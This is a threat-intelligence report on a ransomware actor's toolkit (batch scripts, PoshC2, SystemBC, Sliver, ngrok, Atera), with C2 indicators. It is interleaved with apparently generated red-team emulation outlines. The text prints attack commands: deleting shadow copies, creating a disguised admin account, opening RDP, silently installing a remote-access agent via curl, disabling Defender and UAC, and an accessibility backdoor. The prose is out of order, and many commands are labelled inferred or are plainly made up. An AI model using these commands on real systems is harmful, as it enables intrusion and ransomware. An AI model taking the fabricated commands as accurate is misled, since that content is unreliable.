Its noteworthy that the threat actor mistyped Delete (Delite) multiple times in the script comments, this could indicate that English may be a second language for this threat actor. An additional capability of this script, its disabling and deleting of Volume Shadow Copies (vssadmin.exe Delete Shadows /All /Quiet), suggests that it is meant to be used during ransomware attacks, to accelerate the encryption and prevent the victim from recovering the files. Similar scripts have been reported in a number of our ransomware reports. hyp.bat The name of this batch script suggests it is a Hyper-V-related tool. The script has more than 100 lines and starts with the following commands to delete Hyper-V services: The script also deletes two services related to FireBird: Firebird is an open-source SQL relational database system that offers high performance, scalability, and robust features. The rest of the script overlaps with the files we’ve previously analyzed in this report, disabling different database services and killing their processes.

Phase: Defense Evasion

• Technique: Disable and Delete Volume Shadow Copies
• Command: vssadmin.exe Delete Shadows /All /Quiet
• Purpose: To prevent recovery of files during a ransomware attack.

Phase: Impact

• Technique: Service Stop for Impact
• Procedure: Batch script (hyp.bat) used to delete Hyper-V services and Firebird database-related services.
• Context: The script contains commands to delete or disable services, impacting system and database availability.

Likely Commands Inferred:

• Hyper-V Services Deletion:
• sc delete <ServiceName>

• net stop <ServiceName>

• Firebird Services Deletion:

• sc delete <FirebirdServiceName>
• net stop <FirebirdServiceName>

Phase: Execution

• Technique: Batch Script Execution
• Procedure: Execution of hyp.bat containing over 100 lines targeting multiple services.

Phase: Impact

• Technique: Process Termination
• Procedure: Kill database processes to disrupt operations.

Additional Context:

• The script mistyped "Delete" as "Delite," suggesting potential language barriers for the threat actor.
• Emphasis on disabling critical services to accelerate encryption processes and hinder recovery efforts.

This structured guide maintains the logical flow of the threat actor's procedures, enabling red teams to emulate similar attack patterns effectively.

The query session command queries the current sessions on the system and saves the results to a text file. The batch script then iterates over the text files skipping the first line and extracting the session IDs from the 3 token (column). The sessions are then logged off using the session IDs obtained, and the text file is deleted. LOGOFALL1.bat This script is similar to LOGOFALL1.bat and serves the same objectives. This enhanced version logs off the users or sessions that didn’t meet the current condition only. if /i “%%b”==”%username%” checks if the second token (session name) is equal to the current username (%username%). If the session name matches the current user, the session ID (%%c) is stored in the variable curID. This following line for /L %%C in (0,1,20) do if “%%C” neq “%curID%” logoff %%C initiates a for / L loop that iterates from 0 to 20. For each value of %%C, it checks if the value does not equal to the current session ID stored in %curID%. If the session ID doesn’t match the current session ID, it logs off the session with the ID %%C. NG1.bat This batch script contained three lines of ngrok configuration: The ngrok config add-authtoken command saves the ngrok authtoken to the configuration file. While ngrok tcp can be used to start a TCP tunnel, which forwards all traffic on a public port to a local server (RDP in this case), it is also extremely useful for exposing services that run non-HTTP traffic (SSH, SIP, RDP, RTSP, GRPC, game servers, etc). NG2.bat This script is similar to the first ngrok script NG1.bat. Only the authentication token differs: ngrok.exe

Phase: Host Manipulation

• Technique: Session Identification and Logoff
• Command:
• query session > sessions.txt
• Batch script iterates over sessions.txt, skipping the first line and extracting session IDs to log off users.
• Script Example: batch for /f "skip=1 tokens=3" %%a in (sessions.txt) do ( if /i "%%b"=="%username%" set curID=%%c for /L %%C in (0,1,20) do ( if "%%C" neq "%curID%" logoff %%C ) ) del sessions.txt

Phase: External Remote Access

• Technique: External Remote Services (ngrok)
• Command:
• ngrok config add-authtoken <token>
• ngrok tcp 3389
• Description: Establishes a TCP tunnel for RDP access.

Note: Ensure you have the necessary permissions and legal authorization to use these commands in a specific environment.

LOGOFALL.bat This script is one of the shortest scripts in the threat actor’s toolkit. It has a straightforward functionality:

Phase: Impact

• Technique: System Shutdown or Reboot
• Procedure: A batch script (LOGOFALL.bat) is used by the threat actor to log off users or shutdown systems, likely using the shutdown or logoff command within the script.

Example of Likely Command within Script: - Command: shutdown /s /f /t 0 or logoff

Publishes your computer and resources attached to your computer so they can be discovered over the network sc.exe config upnphost start= auto Allows UPnP devices to be hosted on your computer References: PoshC2 The Posh_v2_dropper_x64.exe is, as its name states, a PoshC2 dropper. Specifically, the sample is a C++ CLR (Common Language Runtime, a.k.a. .NET) loader which executes a PoshC2 PowerShell Dropper with the below reconstructed configuration. { "ConnectURL": "/webhp/", "Key": "bX7WACSlpm2NpvJdQbRV8DHAjmEJpKWM8n4bkG6bzCI=", "KillDate": "2999-12-01", "URLID": 1, "PayloadCommsHost": "https://94.198.53.143", "StageRetriesLimit": 30, "StageRetries": true, "StageRetriesInitialWait": 60, "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" } The usage of the default kill date and TLS certificate (besides all other tools and “geographic” location) are common indications of the C2 being adversary instead of red team infrastructure. At the time of writing, the Posh Command & Control service is still actively responding. Hunting for additional PoshC2 infrastructure can be done through the default TLS certificate settings. native_dropper native_dropper is the Linux version of Posh_v2_dropper_x64.exe, which is the Windows version of it. By checking the hash of this file (63229da1bed0c0eafc4ed087651af3eec521e7fbd098300f7d862582d03a675d), we can see that it is now flagged by most of the AV vendors as malicious with 58/72 ratings.

Phase: Persistence

• Technique: Service Configuration
• Command: sc.exe config upnphost start= auto

Phase: Execution

• Technique: PowerShell Execution via PoshC2 Dropper
• Procedure: Execute Posh_v2_dropper_x64.exe, a C++ CLR loader to run a PoshC2 PowerShell dropper with a specific configuration. Key settings include:
• ConnectURL: /webhp/
• PayloadCommsHost: https://<C2 Host>
• UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...

Phase: Initial Access

• Technique: File Execution via Dropper
• Procedure: Use native_dropper on Linux as equivalent to the Windows Posh_v2_dropper_x64.exe for executing payloads.

These procedures enable emulation of the threat actor's tactics and techniques using PowerShell execution, service manipulation, and cross-platform droppers.

This binary is legitimate and signed ngrok agent. Some AV vendors tag it as malicious with a PUP category. The presence of this binary in your environment can be a great indicator of compromise if you are not using it. ON.bat This type of command was used by Blackbyte, Promethus, Phobos and other ransomware groups as part of their playbook to perform configuration on several services. Aside from starting multiple services using net start command, below are the configuration changes using sc command sc.exe config Dnscache start= auto Caches DNS names and registers the full computer name for your computer sc.exe config SSDPSRV start= auto Enables discovery of UPnP devices on your home network sc.exe config FDResPub start= auto

Phase: Persistence

• Technique: Service Configuration for Persistence
• Command: sc.exe config Dnscache start= auto

• Description: Configures the DNS Client service to start automatically, which is used to cache DNS names.

• Command: sc.exe config SSDPSRV start= auto

• Description: Sets the SSDP Discovery service to auto-start, enabling discovery of UPnP devices.

• Command: sc.exe config FDResPub start= auto

• Description: Configures the Function Discovery Resource Publication service to start automatically.

Phase: Execution

• Technique: Service Execution
• Command: net start <service_name>
• Description: Starts specified services as part of the configuration changes.

Additional Tool

• Tool: ngrok agent
• Description: A legitimate tunneling tool potentially used for maintaining remote access.

Performing a quick string reveals the configuration of this PoshC2. Packetwatch also discussed it on their blog last year. domain_front_hdr=94.198.53.143 server_clean=https://94.198.53.143 ua=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36 proxy_url= proxy_user= proxy_pass= urls=webhp/ urls=adsense/troubleshooter/1631343/ urls=trader-update/history&pd=/ urls=status/995598521343541248/query=/ urls=uasclient/0.1.34/modules/ urls=utag/lbg/main/prod/utag.15.js/ urls=GoPro5/black/2018/ urls=usersync/tradedesk/ urls=bootstrap/3.1.1/bootstrap.min.js/ urls=TOS/ urls=business/home.asp&ved=/ urls=web/20110920084728/ urls=vssf/wppo/site/bgroup/visitor/ urls=Philips/v902/ urls=bh/sync/aol/ urls=async/newtab/ urls=advanced_search/ urls=adServingData/PROD/TMClient/6/8736/

Phase: Initial Setup

• Technique: C2 Infrastructure Setup with PoshC2
• Details: The threat actor uses PoshC2 with a specific domain and server configuration. This implies the actor has set up a C2 server to manage and control compromised systems.

Phase: C2 Communication

• Technique: Domain Fronting and URL Path Obfuscation
• Procedure: The threat actor employs various URL paths to obscure C2 communication. URLs such as "webhp/" and "bootstrap/3.1.1/bootstrap.min.js/" are used to conceal malicious traffic within legitimate-looking paths.

Phase: Execution

• Technique: User-Agent Impersonation
• Details: The communication uses a common User-Agent string to blend in with normal web traffic.
• String: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36

These tactics show the actor's focus on evading detection and maintaining persistent communication channels with the use of obfuscated URL paths and user-agent impersonation.

urls=vfe01s/1/vsopts.js/ urls=cisben/marketq/ urls=business/retail-business/insurance.asp/ urls=client_204/ urls=branch-locator/search.asp/ urls=work/embedded/search/ urls=babel-polyfill/6.3.14/polyfill.min.js=/ urls=cdba/ urls=putil/2018/0/11/po.html/ urls=qqzddddd/2018/load.php/ urls=types/translation/v1/articles/ urls=classroom/sharewidget/widget_stable.html/ jitter=0.2 sleep_time=5 kill_date=32501019600 poshc2+user.txt While analyzing the files, the ones we observed on the second IP after pivoting with Shodan (185.234.216.64:8000), one additional thing that caught our attention was the poshc2+user.txt file. Let’s take a look at the content of this text file. The text file contains multiple commands that we will be dividing into four parts: 1: PowerShell encoded commands Below are the PowerShell decoded commands. The download link mentioned on the below decoded commands is not accessible anymore.

Phase: Reconnaissance

• Technique: Shodan for Network Exploration
• Procedure: Pivoting through Shodan to identify potential target systems.

Phase: Execution

• Technique: PowerShell Execution with Encoded Commands
• Command Decoding: Analyzing PowerShell commands after decoding base64 strings.
• Procedure: Utilize decoded PowerShell commands for executing payloads.

Phase: Lateral Movement

• Technique: Use of Tools for Lateral Movement
• Tool: PosHC2 framework
• Procedure: Execution of poshc2+user.txt file containing various lateral movement scripts and commands.

Phase: Command and Control (C2)

• Technique: C2 Communication and Control File
• File: poshc2+user.txt
• Procedure: Configuring the C2 with parameters such as jitter (0.2), sleep time (5), and kill date (32501019600).

Phase: Persistence

• Technique: Scheduled Task Configuration
• Command Inference: Based on the use of poshc2 framework, it's likely that scheduled tasks or similar persistence mechanisms were deployed as part of the attack's persistence strategy.

Note: Specific decoded command details were not captured due to lack of accessibility to the original encoded content.

2: Creation of User Account The below commands are used to create a user account “WDAGUtilltyAccount” with a password of “Ujmqaz5055”. After creating this account, it will be added to the administrator local group. Notice that this user was trying to masquerade the common system account in Windows “WDAGUtilityAccount” with a little typo of “l” instead of “i”. net user WDAGUtilltyAccount Ujmqaz5055 /add net localgroup Administrators WDAGUtilltyAccount /add 3: Enable Remote Desktop Protocol These commands are divided into two parts. The first one is registry modification, which is used to enable Remote Desktop Protocol (RDP) on a Windows machine by setting the value of “fDenyTSConnections” to “0”. The second command manipulates and configures the Windows Firewall to allow inbound RDP connections by opening TCP port 3389. reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections / t REG_DWORD /d 0 /f netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow 4: Download and Install Atera Agent The provided commands utilize ‘curl’ to download the Atera Agent installation setup file, specifying the necessary Gmail and account ID. Upon executing the entire command sequence, the ‘setup.exe’ file for the Atera Agent was successfully downloaded without encountering any issues. curl -o setup.msi "https://HelpdeskSupport613811560.servicedesk.atera.com/GetAgent/Msi/? customerId=1&integratorLogin=datilragna@gmail.com&accountId=" && msiexec /i setup.msi /qn IntegratorLogin=datilragna@gmail.com CompanyId=1 AccountId=

Phase: Persistence

• Technique: Create User Account
• Command: net user WDAGUtilltyAccount Ujmqaz5055 /add
• Command: net localgroup Administrators WDAGUtilltyAccount /add
• Description: Creates a user account masquerading as a legitimate system account and adds it to the local administrators group for elevated privileges.

Phase: Defense Evasion and Lateral Movement

• Technique: Enable Remote Desktop Protocol
• Command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
• Description: Modifies the registry to enable RDP connections.
• Command: netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
• Description: Configures the firewall to allow RDP traffic through port 3389.

Phase: Execution

• Technique: Software Download
• Command: curl -o setup.msi "https://HelpdeskSupport613811560.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=datilragna@gmail.com&accountId=<redacted>"
• Description: Downloads the Atera Agent setup file using curl.
• Technique: Software Deployment
• Command: msiexec /i setup.msi /qn IntegratorLogin=datilragna@gmail.com CompanyId=1 AccountId=<redacted>
• Description: Silently installs the Atera Agent using MSI package with specified parameters.

py_dropper.sh This script is an encoded PoshC2 Python payload dropper. Decoding the base64 encoded blob results in the following Python script: This script is a configured version of https://github.com/nettitude/PoshC2/blob/master/ resources/payload-templates/dropper.py . Decoding it gives us several insights and IOCs (C2 IP, callback URLs, UA) on the threat actor’s infrastructure and methods. The configuration of settings in this sample, match the same ones observed in the prior samples mentioned, indicating that they were generated during the same server build. setup_uncnow.mmsi This installer deploys the Atera agent, which is part of a remote monitoring and management tool. This tool has commonly misused by various threat actors for intrusions. shadow.bat Contrary to what the script name indicates, this script focus on more than just Volume Shadow Copies.

Phase: Execution

• Technique: Python Script Execution
• Procedure: The threat actor uses an encoded PoshC2 Python payload dropper with base64 decoding to execute a Python script. This script is based on PoshC2's dropper template.

Phase: Persistence

• Technique: Remote Monitoring and Management Tool Deployment
• Procedure: A script named setup_uncnow.mmsi installs the Atera agent, which can be used for persistent access and remote system management.

Phase: Impact

• Technique: Batch Script Execution for System Modifications
• Procedure: A script named shadow.bat is executed to perform actions beyond managing Volume Shadow Copies, potentially altering system configurations or data.

The conditional statement is based on the system architecture PROCESSOR_ARCHITECTURE check, and make registry modifications accordingly. Depending on whether the system is 32-bit or 64-bit, registry changes are made using appropriate paths (/reg:32 or /reg:64). VmManagedSetup.exe The VmManagedSetup.exeexecutable was identified as SystemBC, a malware strain known to perform initial reconnaissance and deliver follow-up malware on select targets. Upon starting, the malware immediately persists itself. This SystemBC sample does so through run-key persistence. Specifically, it creates the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key of value socks5, intended to execute the sample through PowerShell. While this approach is far from stealthy, SystemBC is known to infect miss-managed corporate devices, often lacking security

Phase: Persistence

• Technique: Run-Key Persistence
• Procedure: The malware uses a registry run key for persistence.
• Command:
• For 32-bit Systems: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v socks5 /t REG_SZ /d "powershell <malicious command>" /reg:32
• For 64-bit Systems: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v socks5 /t REG_SZ /d "powershell <malicious command>" /reg:64

Phase: Execution

• Technique: PowerShell Execution
• Procedure: Executes the malware sample through a PowerShell command embedded in the registry.

Phase: Initial Access

• Technique: Reconnaissance and Follow-up Malware Delivery
• Tool: VmManagedSetup.exe (identified as SystemBC)
• Procedure: VmManagedSetup.exe is used for initial reconnaissance and delivering follow-up malware.

The script uses two commands vssadmin.exe Delete Shadows /All /Quiet and vssadmin delete shadows /all to delete all shadow copies of files and folders on the system. The script also performs multiple defense evasion techniques by disabling Windows Defender, enabling RDP, and backdooring the system by replacing the accessibility features by cmd.exe as previously seen in cmd.cmd script. shadowGuru.bat This script has two main functions. It first uses the net share command to share several drives with full access permissions to everyone on the network: Then, it uses a condition to perform several registry cleanups and modifications related to AV programs:

Phase: Defense Evasion

• Technique: Shadow Copy Deletion

• Commands:

  • vssadmin.exe Delete Shadows /All /Quiet
  • vssadmin delete shadows /all

• Technique: Disable Windows Defender

• Procedure: Disables Windows Defender using registry changes or Group Policy modifications.

Phase: Lateral Movement

• Technique: Enable Remote Desktop Protocol (RDP)
• Procedure: Enables RDP through system settings or registry modifications.

Phase: Persistence

• Technique: Accessibility Features Backdoor
• Procedure: Replaces accessibility features binaries with cmd.exe for unauthorized access.

Phase: Lateral Movement

• Technique: Network Share Creation
• Command:
  • net share <DriveName>=<DrivePath> /grant:everyone,FULL

Phase: Defense Evasion

• Technique: Registry Modification
• Procedure: Performs registry cleanups and modifications targeting antivirus programs to disable or evade detection.

software. After persistence has been established, SystemBC launches its main thread. As shown below, SystemBC starts by launching a separate kill-switch thread, listening locally to avoid concurrent runs. The malware then periodically beacons, alternating between two C2s. To evade detection, SystemBC ensures its configuration is only decrypted to establish the C2 connection. The malware supports both IPs and host names as C2 addresses. The XOR-decoded configuration exposes both SystemBC servers as 94.198.55.181:4337 and 94.198.51.247:4337. 00000000 42 45 47 49 4e 44 41 54 41 48 4f 53 54 31 3a 39 |BEGINDATAHOST1:9| 00000010 34 2e 31 39 38 2e 35 35 2e 31 38 31 00 00 00 00 |4.198.55.181....| 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000030 00 00 00 00 00 00 00 48 4f 53 54 32 3a 39 34 2e |.......HOST2:94.| 00000040 31 39 38 2e 35 31 2e 32 34 37 00 00 00 00 00 00 |198.51.247......|

Phase: Persistence

• Technique: Malware Scheduled Execution
• Procedure: SystemBC establishes persistence by ensuring it starts automatically upon system boot.

Phase: Execution

• Technique: Malware Execution
• Procedure:
• Launches a kill-switch thread to prevent concurrent runs.
• Periodically beacons to alternate between two C2 servers.

Phase: Evasion

• Technique: Encrypted Configuration
• Procedure:
• Decrypts configuration only to establish the C2 connection, using XOR decryption.

Phase: Command and Control

• Technique: Beaconing
• Procedure:
• SystemBC beacons to C2 servers using both IPs and host names, as specified in the decrypted configuration data.

The above details elucidate SystemBC's operation, focusing on persistence, execution, evasion, and command and control tactics.

00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000060 00 00 00 00 00 50 4f 52 54 31 3a 34 33 33 37 00 |.....PORT1:4337.| 00000070 00 |.| As SystemBC’s main functionality is to deploy additional malware, its download logic provides additional IoCs. As outlined below, the VmManagedSetup.exe executable is capable of fetching additional payloads using a GET request over HTTP/1.0. The employed user agent is: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Its noteworthy that the download functionality relies on the default hard-coded port INTERNET_DEFAULT_HTTP_PORT, indicative of plain HTTP communications on port 80. These types of communications typically empower organizations to detect suspicious activity through network appliances.

Phase: Execution

• Technique: Execution of Malicious Payload
• Procedure: The attacker uses the VmManagedSetup.exe executable to deploy additional malware.

Phase: Command and Control

• Technique: HTTP Communication for Payload Download
• Procedure:
• Tool: VmManagedSetup.exe
• Action: Fetch additional payloads using an HTTP GET request.
• User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
• Port: Uses INTERNET_DEFAULT_HTTP_PORT (port 80) for communication.

The steps reflect potential scenarios for red team emulation based on the malware's capabilities as described.

Reference: https://www.virustotal.com/gui/file/ cc4960939a41d6a281ddad307b107e16214f4aeda261c9b5037f26e60dc7bba2/detection WILD_PRIDE.exe The WILD_PRIDE.exe executable is a Sliver implant, an open-source adversary “emulation” framework. As the Sliver framework is written in Go and obfuscated using garble, relying on dynamic analysis provides the easiest method for C2 identification, which for this sample is the 94[.]198[.]53[.]143 open-directory server. Sliver relies on Protobuf to serialize command & control communications, which luckily, aren’t as easily obfuscated. By performing a string analysis against the project’s Protobuf definitions (identifying included and excluded changes in protobuf/sliverpb/sliver.proto), we were able to scope down the implant version to likely 1.5.40 or 1.5.41, released mid-2023 to address CVE-2023-34758.

Phase: Initial Access

• Technique: Utilizing Sliver Framework Implant
• Procedure: The threat actor deploys the WILD_PRIDE.exe executable, which acts as a Sliver implant, to gain initial access to the target system.

Phase: Command and Control

• Technique: C2 Communication via Protobuf
• Procedure: Communicates with the C2 server using serialized Protobuf messages, allowing for structured command and control interactions.

Phase: Execution

• Technique: Execution via Obfuscated Sliver Implant
• Procedure: The implant executes commands parsed from received Protobuf messages. The specifics of execution are managed by Sliver's internal functionalities.

Phase: Persistence

• Technique: Potential Persistence via Scheduled Task or Service Creation
• Inference: Likely uses Sliver framework capabilities to establish persistence, potentially through scheduled tasks or service creation for automatic implant execution.

Phase: Lateral Movement

• Technique: Internal Framework Capabilities
• Inference: Sliver may use built-in commands to facilitate lateral movement within the network, such as RDP or Windows Management Instrumentation (WMI).

Phase: Credential Access

• Technique: Credential Dumping Using Built-in Tools
• Inference: Possible use of embedded Sliver commands that mimic traditional tools like Mimikatz to extract credentials from memory.

Phase: Defense Evasion

• Technique: Obfuscation via garble
• Procedure: The implant is obfuscated using garble, which complicates static analysis and detection by security tools.

Reference: z.bat This script contains 242 lines of code that mainly performs the deletion of services. These are divided into some of the different AV vendors, Hyper-V, and SQL, based on the below categories. rem Delite Service "Hyper-V" rem Delite Service "AVG" rem Delite Service "Malwaresbytes" rem Delite Service "Sofos" rem Delite Service "Fire_Bird" rem Delite Service "SQL" rem Delite Service "AV: Webroot" rem Delite Service "AV: ESET" rem Delite Service "AV: Kaspersky" rem Delite Service "AV: Quick Heal" rem Delite Service "AV: McAfee" rem Delite Service "AV: Trend Micro" rem Delite Service "AV: Panda" Aside from deletion of services, it also performs the killing of multiple processes. rem Kill rem Kill "AV: Trend Micro" rem Kill "SQL" These commands are used to check if specific antivirus or endpoint security services are running on a Windows system. tasklist /fi “imagename eq MsMpEng.exe”: This checks if the process for Windows Defender (MsMpEng.exe) is running. | find /c “PID”: This part filters the previous command’s output, counting how many lines contain the term “PID” (a way to check if the process was found).

Phase: Defense Evasion

• Technique: Service Deletion

• Procedure: The script automates the deletion of services related to antivirus, Hyper-V, and SQL.

  • Services Targeted:
  • Hyper-V
  • AVG
  • Malwarebytes
  • Sophos
  • Fire_Bird
  • SQL
  • Webroot
  • ESET
  • Kaspersky
  • Quick Heal
  • McAfee
  • Trend Micro
  • Panda

• Technique: Process Termination

• Procedure: The script includes commands to terminate processes associated with Trend Micro and SQL.

• Technique: System Service Discovery

• Command: tasklist /fi "imagename eq MsMpEng.exe"

  • Purpose: To check if the Windows Defender process is running.

• Command: | find /c "PID"

  • Purpose: To count the number of processes found, verifying if the specific process is active.

These procedures enable a threat actor to evade defenses by disabling security services and processes.

&& Echo Windows Defender: If the previous command found the process (meaning Windows Defender is running), this part will display “Windows Defender”. The same structure applies to the other lines, but they check for different processes: MBCloudEA.exe & MBAMService.exe – Malwarebytes ntrtscan.exe – Trend Micro Security. avp.exe – Kaspersky Endpoint Security. WRSA.exe – Webroot. egui.exe – ESET. AvastUI.exe f – Avast. TASKKILL /F /FI "PID ge 1000" /FI "WINDOWTITLE ne untitle*" The last command on this script is used to forcefully stop all processes with a PID of 1000 or higher, except those whose window titles start with “untitle”. z1.bat This is by far the most extensive script on this opendir, and it contains over 772 lines of commands. It has exactly the same content of the previous script (z.bat) with additional defense evasion techniques and capabilities. rem Delite Service "Hyper-V" rem Delite Service "AVG" rem Delite Service "Malwaresbytes" rem Delite Service "Sofos" rem Delite Service "Fire_Bird" rem Delite Service "SQL" rem Delite Service "AV: Webroot" rem Delite Service "AV: ESET" rem Delite Service "AV: Kaspersky" rem Delite Service "AV: Quick Heal" rem Delite Service "AV: McAfee" rem Delite Service "AV: Trend Micro" rem Delite Service "AV: Panda" The first part of the script deletes services targeting well-known security AV vendors, as well as services related to Hyper-V and Microsoft SQL.

Phase: Defense Evasion

• Technique: Disable Security Tools

• Procedure: The script checks for the presence of security tools and attempts to disable them by identifying active processes associated with known antivirus and security software:

  • Processes Checked:
  • Windows Defender
  • MBCloudEA.exe & MBAMService.exe (Malwarebytes)
  • ntrtscan.exe (Trend Micro Security)
  • avp.exe (Kaspersky Endpoint Security)
  • WRSA.exe (Webroot)
  • egui.exe (ESET)
  • AvastUI.exe (Avast)

• Technique: Kill Process

• Command: TASKKILL /F /FI "PID ge 1000" /FI "WINDOWTITLE ne untitle*"
• Procedure: Forcefully stops all processes with a PID of 1000 or higher, except those whose window titles start with “untitle”.

Phase: Defense Evasion

• Technique: Service Deletion
• Procedure: The script deletes services associated with various security and system functions:
  • Services Targeted:
  • Hyper-V
  • AVG
  • Malwaresbytes
  • Sofos
  • Fire_Bird
  • SQL
  • AV: Webroot
  • AV: ESET
  • AV: Kaspersky
  • AV: Quick Heal
  • AV: McAfee
  • AV: Trend Micro
  • AV: Panda

These commands delete registry entries for various antivirus and security services from the Windows Registry. By targeting the HKLM\SYSTEM\CurrentControlSet\services\ path, they remove configurations for security software such as Kaspersky, Malwarebytes, McAfee, Norton, Avast, AVG, Avira, and many others, effectively disabling these services. This part of the script has already been discussed in previous scripts. These are mainly related to Windows settings to enable Remote Desktop, adjust firewall rules, alter the behavior of certain utility programs, and change security policies. Specifically, they allow Remote Desktop connections, create a firewall rule to allow incoming Remote Desktop traffic, and replace the functions of various accessibility tools and Help features with the Command Prompt. Additionally, they disable UAC and Windows Defender and modify Remote Desktop, potentially weakening system security. Victim During the analysis of the open directories identified in this investigation no information was discovered relating to targeting or victims. Indicators Atomic PoshC2 IP Address: 94.198.53.143 185.234.216.64 Extracted C2 URLs: /webhp/ /adsense/troubleshooter/1631343/

Phase: Defense Evasion

• Technique: Modify Registry to Disable Security Services
• Procedure: Delete registry entries for antivirus and security services using the path HKLM\SYSTEM\CurrentControlSet\services\ to target security software like Kaspersky, Malwarebytes, McAfee, Norton, Avast, AVG, and Avira.

Phase: Execution

• Technique: Remote Desktop Accessibility
• Procedure: Enable Remote Desktop connections through registry modifications and system settings adjustments.
• Command (inferred): reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Phase: Defense Evasion

• Technique: Modify Firewall Rules
• Procedure: Create a firewall rule to allow incoming Remote Desktop traffic.
• Command (inferred): netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow

Phase: Execution/Defense Evasion

• Technique: Accessibility Features Abuse
• Procedure: Replace functions of accessibility tools with Command Prompt.
• Command (inferred): Replace sethc.exe with cmd.exe using copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

Phase: Defense Evasion

• Technique: Disable UAC and Windows Defender
• Procedure: Modify settings to disable User Account Control (UAC) and Windows Defender.
• Command (inferred):
  • Disable UAC: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
  • Disable Windows Defender: sc config WinDefend start= disabled

Second part of the script is to stop multiple services related to MS SQL, as well as disable the related services via “sc config” command.

Phase: Impact

• Technique: Service Stop and Disable
• Procedure: The attacker stops multiple MS SQL services and disables them to disrupt database operations.

Phase: Execution

• Technique: Service Stop
• Command: net stop <service_name>

Phase: Persistence

• Technique: Service Configuration Change
• Command: sc config <service_name> start= disabled

(Replace <service_name> with the actual service names targeted by the attacker.)

/trader-update/history&pd=/ /status/995598521343541248/query=/ /uasclient/0.1.34/modules/ /utag/lbg/main/prod/utag.15.js/ /GoPro5/black/2018/ /usersync/tradedesk/ /bootstrap/3.1.1/bootstrap.min.js/ /TOS/ /business/home.asp&ved=/ /web/20110920084728/ /vssf/wppo/site/bgroup/visitor/ /Philips/v902/ /bh/sync/aol/ /async/newtab/ /advanced_search/ /adServingData/PROD/TMClient/6/8736/ /vfe01s/1/vsopts.js/ /cisben/marketq/ /business/retail-business/insurance.asp/ /client_204/ /branch-locator/search.asp/ /work/embedded/search/ /babel-polyfill/6.3.14/polyfill.min.js=/ /cdba/ /putil/2018/0/11/po.html/ /qqzddddd/2018/load.php/ /types/translation/v1/articles/ /classroom/sharewidget/widget_stable.html/ SystemBC IP addresses: 94.198.55.181:4337 94.198.51.247:4337 Computed atera_del.bat 754e08c93369e5bfe24ca09b422affdd 591379f5d7d256e83de05207fd872acfa8e8aa5e ea7dec8fa52d2300350367691ae2fbea13dbd5bf80d6b43b05eedf197529aa77 atera_del2.bat

Phase: Persistence

• Technique: Batch Script Execution
• Procedure: The threat actor likely used batch scripts atera_del.bat and atera_del2.bat for persistence or cleanup tasks. The exact contents of these scripts are not specified, but they may include automated tasks such as file deletion, network connections, or service manipulation.

Phase: Execution

• Technique: JavaScript Execution
• Procedure: The presence of paths like /bootstrap/3.1.1/bootstrap.min.js/ and /babel-polyfill/6.3.14/polyfill.min.js=/ suggests the potential use of JavaScript libraries, which could be employed for executing scripts in a web context or manipulating web elements for further attacks.

Phase: Lateral Movement

• Technique: SystemBC Proxy
• Procedure: SystemBC is identified by IP addresses, suggesting the use of this backdoor/proxy tool for facilitating remote access or communication with command and control servers. The likely use includes creating a SOCKS5 proxy to obfuscate network traffic.

Recommended Commands for Emulation:

• Batch Command Execution: Inspect and create similar batch files to test persistence mechanisms.

• Example: cmd.exe /c atera_del.bat

• JavaScript Library Usage: Use JavaScript libraries in a simulated attack to understand web-based execution impacts.

• Example: node -e "require('bootstrap');"

• Proxy Setup with SystemBC: Simulate the setup of a proxy using similar tools.

• Example: systembc -listen 127.0.0.1 -port 1080 -remote <C2 Server>

This structure supports red team operations by detailing applicable procedures and inferred tactics based on observed patterns in threat actor behavior.

